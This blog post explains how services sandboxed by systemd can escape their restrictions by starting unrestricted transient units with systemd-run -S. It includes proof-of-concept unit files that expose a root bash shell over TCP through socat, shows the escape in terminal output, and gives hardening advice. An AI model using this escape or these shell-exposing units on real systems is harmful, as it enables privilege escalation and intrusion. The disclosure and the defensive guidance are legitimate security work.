Today, the most popular Linux service manager is systemd.

Services are defined in units located in defined directories. Package units are in /usr/lib/systemd/system and administrators add their units to /etc/systemd/system. In addition to the system service manager, systemd provides a user service manager, for user services. User units are in other directories, including in the user's home directory.

System and user services can be sandboxed with many different properties, including restrictions on the file system, device access, net interfaces, and so on.

TL;DR

Because (1) with transient units, it's possible to create a new service without writing a configuration file, (2) read-only access to systemd socket doesn't prevent communication with it, and (3) systemd access control relies on polkit only: having a read-only filesystem doesn't prevent the creation of new services with more privileges than the current one.

Access control is based exclusively on polkit, which only works with the system's service and authorizes all calls from root. If you write units, do not run your system unit as root and add ProtectHome=true to your service unit.

Else, the systemd unit sandboxes are trivially escaped. If you really need to run as root, you may deny access to systemd sockets as a workaround. It's not a bug, but it's not explicitly documented.

If you are using another sandbox system, be aware that these sockets can also be used to escape it.

Introduction

As introduced recently, I've recently reinstalled my laptop. In my previous setup, I was using container-based isolations for various shell environments. I had a script to generate new toolbox containers with some isolations, for the home and other directories. No surprise, this time I wanted to switch to a systemd-based isolation. (I will share in another post)

systemd-run is a tool to run services on-demand using transient units, temporary units managed by systemd. It's a useful tool to do some tests, or schedule tasks for example. Every time a new interactive shell is started with systemd-run (systemd-run --user -S), an orange circle is added to the title of the terminal window (🟠 ~). Other systemd features use transient units, like systemd-mount: it starts a temporary unit that mounts a device on the filesystem.

I was using systemd-run to test some sandbox properties (--property ProtectSystem=strict) until my window ended up with 2 circles in its title (🟠🟠 ~).

A few questions then arise: Does systemd control somehow the restrictions of the caller service before starting a transient unit, so a new service can only have additional restrictions (and not lose them)? Does it concerns units managed by the user service manager only or the units managed by the system service manager too? Did I miss something?

Impacted configurations

Transient units are temporary services managed by the service manager. They don't require any config file. So, as soon as we can talk to systemd, it is possible to start new units, even if we don't have write access to the config directories.

It can be more explicit, but the Sandboxing section of the man page of systemd.exec contains a sentence about the ability to talk to systemd on a read-only system:

Note that the various options that turn directories read-only (such as ProtectSystem=, ReadOnlyPaths=, ...) do not affect the ability for programs to connect to and communicate with AF_UNIX sockets in these directories. These options cannot be used to lock down access to IPC services hence.

Polkit is used by systemd to do access control. Polkit is a toolkit to allow unprivileged processes to speak to privileged processes. It allows any call from root to run privileged process, and it isn't used for systemd user service manager (which runs as a user, so isn't privileged).

Given the 3 last points, we can predict 3 possibilities:

  • systemd controls the caller service, and prevents sandboxed services from launching transient units with more privileges than their own
  • systemd controls the caller service, and prevents sandboxed services from launching transient units
  • systemd relies exclusively on polkit for access control, and no other control are performed
[root@archlinux ~]# systemd-run --property DeviceAllow=/dev/vda1 --property ProtectSystem=yes -S
Running as unit: run-p503-i803.service; invocation ID: 4d8fd6bf06534e50b5b478d209c53d7b
Press ^] three times within 1s to disconnect TTY.

[root@archlinux root]# mount /dev/vda2 /mnt
mount: /mnt: fsconfig() failed: /dev/vda2: Can't open blockdev.
       dmesg(1) may have more information after failed mount system call.

[root@archlinux root]# systemd-mount /dev/vda2 /mnt    # Accepted
Started unit mnt.mount for mount point: /mnt

It turns out that systemd relies exclusively on polkit for all access controls. And because polkit isn't used for user units, and because polkit accepts all requests from root, user services and services running as root are able to launch new systemd services with more privileges than their own.

In other words, ProtectSystem=strict alone does not prevent the process from trivially gaining full access to system using systemd, without any sandbox attributes.

If the service runs with another user, but doesn't set ProtectHome=true (implied by DynamicUser=true), or deny access to systemd sockets (InaccessiblePaths=/run/user/<UID>/bus), then the user service manager can be used to start a new service without sandbox attributes.

POC

These tests can be performed with transient units, using systemd-run, but in order to confirm that these tests apply to real units, we can use a unit file that exposes a bash shell to the network with socat.

To illustrate the problem, we can try different configurations with sandboxing options:

  • A system unit running as root
  • A system unit running as a user, the escape works only when the user is connected
  • A user unit

Below are two examples, one for the system unit running as root, the other for the user unit.

System Unit - Root

In this example, the unit is run by the system service manager as root, with 3 sandboxing options: ProtectSystem=strict, ProtectHome=true and InaccessiblePaths=/etc/secret. This unit could be used to sandbox a service that requires certain privileges.

This is a common sandbox configuration.

[Unit]
Description=POC
After=network-online.target

[Service]
Type=simple
UMask=0007
ProtectSystem=strict
ProtectHome=true
InaccessiblePaths=/etc/secret

ExecStart=/sbin/socat tcp-l:8888,fork,reuseaddr exec:'bash -li',pty,stderr,setsid,sigint,sane
KillSignal=SIGINT

Restart=on-failure
TimeoutStopSec=5

[Install]
WantedBy=multi-user.target

The service can escape the sandbox with systemd-run -S: we can see that the process is correctly sandboxed at first: /etc/secret is not accessible. But it is writable after starting a new, unrestricted service with systemd-run.

~> socat stdin tcp:localhost:8888
2025/02/24 16:05:18 socat[134374] W address is opened in read-write mode but only supports read-only
[root@poc /]# cat /etc/secret/poc
cat: /etc/secret/poc: No such file or directory

[root@poc /]# systemd-run -S
Running as unit: run-p4123-i134849.service
Press ^] three times within 1s to disconnect TTY.
[root@poc /]# cat /etc/secret/poc
poc

User Unit

In this example, the unit is run by the user service manager, with a sandboxing option: ProtectHome=read-only. This unit could be used to have a user service, that is expected to read data from the home directory.

[Unit]
Description=POC
After=network-online.target

[Service]
Type=simple
ProtectHome=read-only

ExecStart=/sbin/socat tcp-l:8888,fork,reuseaddr exec:'bash -li',pty,stderr,setsid,sigint,sane
KillSignal=SIGINT

Restart=on-failure
TimeoutStopSec=5

[Install]
WantedBy=multi-user.target

The service can escape the sandbox with systemd-run --user -S: we can see that the process is correctly sandboxed at first: $HOME is not accessible. But it is writable after starting a new, unrestricted service with systemd-run.

~> socat stdin tcp:localhost:8888
2025/02/24 11:36:04 socat[46527] W address is opened in read-write mode but only supports read-only
[poc@poc ~]$ touch a
touch: cannot touch 'a': Read-only file system

[poc@poc ~]$ systemd-run --user -S
Running as unit: run-p5131-i46889.service
Press ^] three times within 1s to disconnect TTY.

[poc@poc ~]$ touch a
[poc@poc ~]$ ls
Desktop  Documents  Downloads  Music  Pictures  Public  Templates  Videos  a

Escaping a system unit running as a user will work the same way if / when the user is connected.

Conclusion

If you look at your own system, you'll find many service units running as root with ProtectSystem=yes|strict|true. The possibility of starting arbitrary, non-sandboxed services on a read-only file system doesn't seem to be widely known.

If you do some security tests and gain access to a sandboxed service, try systemd-run [--user] -S. You'll probably get more privileges.

If you're writing your own unit files, don't run your service as root and use ProtectHome=true or be very careful if you don't. If you must run as root, deny access to most of /run, and at least to /run/dbus/system_bus_socket.

I think systemd should define the ability to run unrestricted transient units behind a property. This capability should be enabled by default unless certain sandbox attributes are declared. Then, if the capability is not given, systemd could either apply the caller context to the transient unit, or deny transient units.

I opened a pull request (which may need some improvments) to systemd to apply caller context to the transient units if the ability to execute an unrestricted transient unit is not given. It was closed without any form of review because that's how it works by design. By design you can use systemd-mount to mount an unauthorized device.

At least, it might be a good idea to clarify this behavior in the documentation.